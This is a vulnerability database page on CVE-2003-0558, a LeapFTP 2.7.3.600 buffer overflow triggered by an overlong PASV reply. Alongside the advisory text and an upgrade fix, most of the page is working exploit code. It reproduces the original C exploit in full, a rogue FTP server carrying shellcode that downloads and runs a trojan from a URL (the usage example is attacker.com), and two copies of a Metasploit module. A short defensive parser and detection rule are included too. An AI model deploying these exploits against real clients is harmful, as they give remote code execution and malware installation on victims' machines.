CVE-2003-0558
CVSS 7.5
Published: 2003-08-18 00:00:00
Revised: 2016-10-17 22:35:19

[Original text] Buffer overflow in LeapFTP 2.7.3.600 allows remote FTP servers to execute arbitrary code via a long IP address response to a PASV request.


[CNNVD] LeapFTP buffer overflow vulnerability (CNNVD-200308-079)

        LeapFTP 2.7.3.600 contains a buffer overflow vulnerability. A remote FTP server can execute arbitrary code by returning an overly long IP address in its response to a PASV request.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0558
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0558
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-079
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=105795219412333&w=2
(UNKNOWN)  BUGTRAQ  20030711 LeapFTP remote buffer overflow exploit

- Vulnerability information

LeapFTP buffer overflow vulnerability
High severity  Buffer overflow
2003-08-18 00:00:00 2005-10-20 00:00:00
Remote
        LeapFTP 2.7.3.600 contains a buffer overflow vulnerability. A remote FTP server can execute arbitrary code by returning an overly long IP address in its response to a PASV request.

- Advisories and patches


- Vulnerability information (54)

LeapFTP 2.7.x Remote Buffer Overflow Exploit (EDBID:54)
windows remote
2003-07-12 Verified
21 drG4njubas
/*
,----------------------------------------------------
;     LeapFTP remote buffer overflow exploit
;              by drG4njubas \\ DWC Group
`----------------------------------------------------
,----------------------------------------------------
;This exploit works against LeapFTP 2.7.3.600
;running on Windows 2000 SP3 Russian edition.
;Technical details: when LeapFTP requests an IP
;and port with the PASV command (if passive mode
;is enabled), a stack buffer overflow occurs if
;the server's reply to the PASV request carries
;a long IP address:
;227 (AAAAAAAAA...(1057 bytes)... ,1,1,1,1,1)
;This overflow can overwrite a Structured
;Exception Handler on the stack with an
;arbitrary value by placing the address data
;beyond the 1057th byte. If the reply contains
;the bytes 0x29 or 0x2E, an exception occurs
;before the Structured Exception Handler is
;overwritten and the program continues its
;normal work. Thanks a lot to RaiSe for his
;wonderful shellcode.
`----------------------------------------------------
*/

#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>   /* strlen, strncmp */

int main(int argc, char *argv[]){

printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n");
printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;\n");
printf("; Coded by drG4njubas \\\\ DWC Security Group ;\n");
printf("; www.dwcgr0up.net ;\n");
printf("'''''''''''''''''''''''''''''''''''''''''''''''''''\n");

if(argc < 3){
printf("USAGE : dwclft273.exe <port> <trojan url>\n");
printf("EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exe\n");
return 1;
}

char exploit[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x30\x5F\xFC\x8B\xF7\x80"
"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2d\x64"
"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2d\x64\x6C\x6C\x08\x49"
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2d\x65\x78\x65\x08\x68"
"\x74\x74\x70\x3A\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x25\x49\xE1"
"\x77\x90\x90\x90\x90\xFE\x83\x75\xFE\xFF\xFF\xFE\x83\xD5\xFE\xFF\xFF\xFE\x83\x25"
"\xFF\xFF\xFF\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x80\xAB\x2F\xFF\xFF\xFF\x03\x80\xAB\x30\xFF\xFF\xFF\x03\x80\xAB\x31\xFF\xFF\xFF"
"\x03\x80\xAB\x32\xFF\xFF\xFF\x03\x80\xAB\x33\xFF\xFF\xFF\x03\x80\xAB\x34\xFF\xFF"
"\xFF\x03\x80\xAB\x35\xFF\xFF\xFF\x03\x80\xAB\x36\xFF\xFF\xFF\x03\x80\xAB\x37\xFF"
"\xFF\xFF\x03\x80\xAB\x38\xFF\xFF\xFF\x03\x80\xAB\x39\xFF\xFF\xFF\x03\x80\xAB\x3A"
"\xFF\xFF\xFF\x03\x80\xAB\x3B\xFF\xFF\xFF\x03\x80\xAB\x3C\xFF\xFF\xFF\x03\x80\xAB"
"\x3D\xFF\xFF\xFF\x03\x80\xAB\x3E\xFF\xFF\xFF\x03\x80\xAB\x3F\xFF\xFF\xFF\x03\x80"
"\xAB\x40\xFF\xFF\xFF\x03\x80\xAB\x41\xFF\xFF\xFF\x03\x80\xAB\x42\xFF\xFF\xFF\x03"
"\x80\xAB\x43\xFF\xFF\xFF\x03\x80\xAB\x44\xFF\xFF\xFF\x03\x80\xAB\x45\xFF\xFF\xFF"
"\x03\x80\xAB\x46\xFF\xFF\xFF\x03\x80\xAB\x47\xFF\xFF\xFF\x03\x80\xAB\x48\xFF\xFF"
"\xFF\x03\x80\xAB\x49\xFF\xFF\xFF\x03\x80\xAB\x4A\xFF\xFF\xFF\x03\x80\xAB\x4B\xFF"
"\xFF\xFF\x03\x80\xAB\x4C\xFF\xFF\xFF\x03\x80\xAB\x4D\xFF\xFF\xFF\x03\x80\xAB\x4E"
"\xFF\xFF\xFF\x03\x80\xAB\x4F\xFF\xFF\xFF\x03\x80\xAB\x50\xFF\xFF\xFF\x03\x80\xAB"
"\x51\xFF\xFF\xFF\x03\x80\xAB\x52\xFF\xFF\xFF\x03\x80\xAB\x53\xFF\xFF\xFF\x03\x80"
"\xAB\x54\xFF\xFF\xFF\x03\x80\xAB\x55\xFF\xFF\xFF\x03\x80\xAB\x56\xFF\xFF\xFF\x03"
"\x80\xAB\x57\xFF\xFF\xFF\x03\x80\xAB\x58\xFF\xFF\xFF\x03\x80\xAB\x59\xFF\xFF\xFF"
"\x03\x80\xAB\x5A\xFF\xFF\xFF\x03\x80\xAB\x5B\xFF\xFF\xFF\x03\x80\xAB\x5C\xFF\xFF"
"\xFF\x03\x80\xAB\x5D\xFF\xFF\xFF\x03\x80\xAB\x5E\xFF\xFF\xFF\x03\x80\xAB\x5F\xFF"
"\xFF\xFF\x03\x80\xAB\x60\xFF\xFF\xFF\x03\x80\xAB\x61\xFF\xFF\xFF\x03\x80\xAB\x62"
"\xFF\xFF\xFF\x03\x80\xAB\x63\xFF\xFF\xFF\x03\x80\xAB\x64\xFF\xFF\xFF\x03\x80\xAB"
"\x65\xFF\xFF\xFF\x03\x80\xAB\x66\xFF\xFF\xFF\x03\x80\xAB\x67\xFF\xFF\xFF\x03\x80"
"\xAB\x68\xFF\xFF\xFF\x03\x80\xAB\x69\xFF\xFF\xFF\x03\x80\xAB\x6A\xFF\xFF\xFF\x03"
"\x80\xAB\x6B\xFF\xFF\xFF\x03\x80\xAB\x6C\xFF\xFF\xFF\x03\x80\xAB\x6D\xFF\xFF\xFF"
"\x03\x80\xAB\x6E\xFF\xFF\xFF\x03\x80\xAB\x6F\xFF\xFF\xFF\x03\x80\xAB\x70\xFF\xFF"
"\xFF\x03\x80\xAB\x71\xFF\xFF\xFF\x03\x80\xAB\x72\xFF\xFF\xFF\x03\x80\xAB\x73\xFF"
"\xFF\xFF\x03\x80\xAB\x74\xFF\xFF\xFF\x03\x80\xAB\x75\xFF\xFF\xFF\x03\x80\xAB\x76"
"\xFF\xFF\xFF\x03\x80\xAB\x77\xFF\xFF\xFF\x03\x80\xAB\x78\xFF\xFF\xFF\x03\x80\xAB"
"\x79\xFF\xFF\xFF\x03\x80\xAB\x7A\xFF\xFF\xFF\x03\x80\xAB\x7B\xFF\xFF\xFF\x03\x80"
"\xAB\x7C\xFF\xFF\xFF\x03\x80\xAB\x7D\xFF\xFF\xFF\x03\x80\xAB\x7E\xFF\xFF\xFF\x03"
"\x80\xAB\x7F\xFF\xFF\xFF\x03\x80\x6B\x80\x03\x80\x6B\x81\x03\x80\x6B\x82\x03\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x61\xF9\xFF\xFF";

char *url = argv[2];
unsigned int i;   /* declared outside the loop: it is used after the loop ends */

if(strlen(url)>80){
printf("ERROR: trojan url is too long!\n");
return 1;
}

for(i = 5; i < strlen(url); i++){
url[i]+=3;
exploit[839+i] = url[i];
}

exploit[839+i] = '\x0B';
exploit[839+i+1] = '\x04';

WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);

SOCKET listen_Sock = socket(AF_INET,SOCK_STREAM,0);
SOCKADDR_IN addr_Sock;

addr_Sock.sin_family = AF_INET;
addr_Sock.sin_addr.s_addr = htonl(INADDR_ANY);
addr_Sock.sin_port = htons(atoi(argv[1]));

printf("Awaiting for connections...\n");

if(bind(listen_Sock,(LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr))) return 1;
if(listen(listen_Sock, 1)) return 1;
SOCKET victim = accept(listen_Sock,NULL,NULL);
printf("Victim connected...\n");

char buffer[2048];
sprintf(buffer, "220 drG4njubas roxx da world...\r\n");
send(victim, buffer, strlen(buffer), NULL);

while(true){
if(recv(victim, buffer, 2048, NULL)==SOCKET_ERROR) return 1;
if(strncmp(buffer, "USER", 4)==0){
sprintf(buffer, "%s\r\n", "331 Password required for user.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASS", 4)==0){
sprintf(buffer, "%s\r\n", "230 User logged in.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "SYST", 4)==0){
sprintf(buffer, "%s\r\n", "215 Windows_NT version 5.0");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "REST", 4)==0){
sprintf(buffer, "%s\r\n", "350 Restarting at blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PWD", 3)==0){
sprintf(buffer, "%s\r\n", "257 Current directory was changed.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "TYPE", 4)==0){
sprintf(buffer, "%s\r\n", "200 Type set to blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASV", 4)==0){
printf("PASV command received, sending exploit...");
sprintf(buffer, "227 (%s,1,1,1,1,1)\r\n", exploit);
send(victim, buffer, strlen(buffer), NULL);
printf("finnished.\n");
break;
}
else{
printf("ERROR: Wrong client or pasv mode is not enabled.\n");
break;
}

}

closesocket(victim);
closesocket(listen_Sock);
WSACleanup();
return 0;
}

// milw0rm.com [2003-07-12]
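Both exploit listings on this page rely on the same root cause: the client copies the host portion of the server's `227` reply into a fixed-size stack buffer without checking its length (the exploit header above gives the triggering shape, `227 (AAAA...(1057 bytes)...,1,1,1,1,1)`). The following is an added example, not code from this page, from LeapFTP or from the exploit authors: a bounds-checked parser for a PASV reply that an FTP client, or a proxy inspecting FTP control traffic, can use to reject such a reply before any byte is copied. The limit `PASV_MAX_REPLY`, the per-field rules, the function names and the sample replies are this example's own assumptions.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Upper bound for a well-formed 227 line. "227 Entering Passive Mode
 * (255,255,255,255,255,255).\r\n" is 54 bytes, so 128 leaves room for
 * verbose server text while still refusing a 1057-byte host field.
 * (Assumed value chosen for this example.) */
#define PASV_MAX_REPLY 128

typedef struct {
    char host[16];   /* dotted quad, NUL-terminated */
    uint16_t port;   /* p1 * 256 + p2 */
} pasv_target;

/* Parse "227 ... (h1,h2,h3,h4,p1,p2)". Returns 0 on success, a negative
 * code on rejection. Nothing is written to *out until every field has
 * been validated, so a malformed reply never reaches a fixed buffer. */
int parse_pasv_reply(const char *reply, size_t len, pasv_target *out)
{
    if (len > PASV_MAX_REPLY) return -1;                 /* oversized: refuse outright */
    if (len < 3 || memcmp(reply, "227", 3) != 0) return -2;

    const char *end = reply + len;
    const char *p = memchr(reply, '(', len);
    if (p == NULL) return -3;
    p++;

    unsigned fields[6];
    for (int i = 0; i < 6; i++) {
        unsigned v = 0;
        int digits = 0;
        while (p < end && isdigit((unsigned char)*p)) {
            if (++digits > 3) return -4;                 /* more than 3 digits in a field */
            v = v * 10 + (unsigned)(*p - '0');
            p++;
        }
        if (digits == 0 || v > 255) return -5;           /* empty field or out of range */
        fields[i] = v;
        if (i < 5) {
            if (p >= end || *p != ',') return -6;        /* wrong separator / field count */
            p++;
        }
    }
    if (p >= end || *p != ')') return -7;

    snprintf(out->host, sizeof out->host, "%u.%u.%u.%u",
             fields[0], fields[1], fields[2], fields[3]);
    out->port = (uint16_t)((fields[4] << 8) | fields[5]);
    return 0;
}

/* Verdict for a NUL-terminated reply (parsed target discarded). */
int verdict(const char *reply)
{
    pasv_target t;
    return parse_pasv_reply(reply, strlen(reply), &t);
}

/* Data port a reply resolves to, or -1 if the reply is rejected. */
int pasv_port_of(const char *reply)
{
    pasv_target t;
    return parse_pasv_reply(reply, strlen(reply), &t) == 0 ? (int)t.port : -1;
}

/* Constructed hostile reply of the shape given in the exploit header:
 * "227 (" + 1057 filler bytes + ",1,1,1,1,1)". Returns the parser verdict. */
int oversized_reply_verdict(void)
{
    char buf[1100];
    int n = snprintf(buf, sizeof buf, "227 (");
    memset(buf + n, 'A', 1057);
    n += 1057;
    n += snprintf(buf + n, sizeof buf - (size_t)n, ",1,1,1,1,1)\r\n");
    pasv_target t;
    return parse_pasv_reply(buf, (size_t)n, &t);
}

int main(void)
{
    pasv_target t;
    /* constructed sample of a legitimate reply */
    const char *good = "227 Entering Passive Mode (192,168,1,10,19,137)\r\n";
    if (parse_pasv_reply(good, strlen(good), &t) == 0)
        printf("accepted: %s port %u\n", t.host, t.port);
    printf("oversized reply verdict: %d\n", oversized_reply_verdict());   /* -1 */
    return 0;
}
```

The same checks double as a detection rule for FTP control traffic: a `227` line longer than the bound, or one whose parenthesised list is not exactly six fields of at most three digits each, is not something a conforming server emits and is worth alerting on, which gives unpatched clients behind an inspecting proxy some protection until they can be upgraded.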
		

- Vulnerability information (16708)

LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow (EDBID:16708)
windows remote
2010-04-30 Verified
0 metasploit
##
# $Id: leapftp_pasv_reply.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::TcpServer
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600
				client that is triggered through an excessively long PASV reply command. This
				module was ported from the original exploit by drG4njubas with minor improvements.
			},
			'Author' 	 => [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2003-0558' ],
					[ 'OSVDB', '4587' ],
					[ 'BID', '7860' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/54' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x0d\().,",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Patrick - Tested against w2k sp0, sp4, xp sp0, xp sp2 en OK.
					[ 'Universal LeapFTP.exe', 	{ 'Ret' => 0x004bdd24 } ], # p/p/r LeapFTP.exe
					[ 'Windows 2000 SP0/4 English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
					[ 'Windows XP SP0 English',	{ 'Ret' => 0x7660139c }	], # p/p/r cscdll.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jun 09 2003',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]),
				OptString.new('SRVNAME', [ true, "Welcome to the ... FTP Service", "Test" ]),
			], self.class)
	end

	def on_client_connect(client)
		return if ((p = regenerate_payload(client)) == nil)

		buffer = "220 Welcome to the " + datastore['SRVNAME'] + " FTP Service.\r\n"
		client.put(buffer)
	end

	def on_client_data(client)


		client.get_once

		# This could be improved if anyone wants to write a FTP server API.
		user = "331 Please specify the password.\r\n"
		client.put(user)

		client.get_once
		pass = "230 Login successful.\r\n"
		client.put(pass)

		client.get_once
		syst = "215 Windows_NT 5.1\r\n"
		client.put(syst)

		client.get_once
		rest = "350 Restart position accepted (100).\r\n"
		client.put(rest)

		client.get_once
		rest = "350 Restart position accepted (0).\r\n"
		client.put(rest)

		client.get_once
		pwd = "257 \"/\"\r\n"
		client.put(pwd)

		client.get_once
		type = "200 Switching to ASCII mode.\r\n"
		client.put(type)

		client.get_once
		port = "500 Illegal PORT command.\r\n" # We force LeapFTP to use PASV. It will try PORT first.
		client.put(port)

		client.get_once
		pasv = "227 Entering Passive Mode ("
		pasv << rand_text_numeric(1053) + generate_seh_payload(target.ret)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << ")\r\n"

		client.put(pasv)

		handler(client)
		service.close_client(client)
	end
end
		

- Vulnerability information (F83033)

LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow (PacketStormID:F83033)
2009-11-26 00:00:00
Patrick Webster  metasploit.com
exploit,overflow
CVE-2003-0558

This Metasploit module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600 client that is triggered through an excessively long PASV reply command. This Metasploit module was ported from the original exploit by drG4njubas with minor improvements.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TcpServer
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600
				client that is triggered through an excessively long PASV reply command. This
				module was ported from the original exploit by drG4njubas with minor improvements.
			},
			'Author' 	 => [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'CVE', '2003-0558' ],
					[ 'OSVDB', '4587' ],
					[ 'BID', '7860' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/54' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x0d\().,",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
				# Patrick - Tested against w2k sp0, sp4, xp sp0, xp sp2 en OK.
					[ 'Universal LeapFTP.exe', 	{ 'Ret' => 0x004bdd24 } ], # p/p/r LeapFTP.exe 
					[ 'Windows 2000 SP0/4 English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
					[ 'Windows XP SP0 English',	{ 'Ret' => 0x7660139c }	], # p/p/r cscdll.dll 
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jun 09 2003',
			'DefaultTarget'  => 0))

		register_options(
			[ 
				OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]),
				OptString.new('SRVNAME', [ true, "Welcome to the ... FTP Service", "Test" ]),
			], self.class)
	end

	def on_client_connect(client)
		return if ((p = regenerate_payload(client)) == nil)	

		buffer = "220 Welcome to the " + datastore['SRVNAME'] + " FTP Service.\r\n"
		client.put(buffer)
	end
	
	def on_client_data(client)
	
	
		client.get_once
		
		# This could be improved if anyone wants to write a FTP server API.
		user = "331 Please specify the password.\r\n"
		client.put(user)
		
		client.get_once
		pass = "230 Login successful.\r\n"
		client.put(pass)
		
		client.get_once
		syst = "215 Windows_NT 5.1\r\n"
		client.put(syst)
		
		client.get_once
		rest = "350 Restart position accepted (100).\r\n"
		client.put(rest)
		
		client.get_once
		rest = "350 Restart position accepted (0).\r\n"
		client.put(rest)
		
		client.get_once
		pwd = "257 \"/\"\r\n"
		client.put(pwd)
		
		client.get_once
		type = "200 Switching to ASCII mode.\r\n"
		client.put(type)
		
		client.get_once
		port = "500 Illegal PORT command.\r\n" # We force LeapFTP to use PASV. It will try PORT first.
		client.put(port)
				
		client.get_once
		pasv = "227 Entering Passive Mode ("
		pasv << rand_text_numeric(1053) + generate_seh_payload(target.ret)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << "," + rand_text_numeric(1)
		pasv << ")\r\n"
		
		client.put(pasv)
		
		handler(client)
		service.close_client(client)
	end
end
    

- Vulnerability information

4587
LeapFTP PASV Reply Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Uncoordinated Disclosure

- Vulnerability description

A buffer overflow exists in LeapFTP. The client fails to validate the IP address returned by the server in its reply to a PASV command, resulting in a stack overflow. With a specially crafted reply, a remote attacker controlling the FTP server can cause arbitrary code execution, resulting in a loss of integrity.

- Timeline

2003-06-08 Unknown
Unknown Unknown

- Solution

Upgrade to version 2.7.4.602 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's related websites.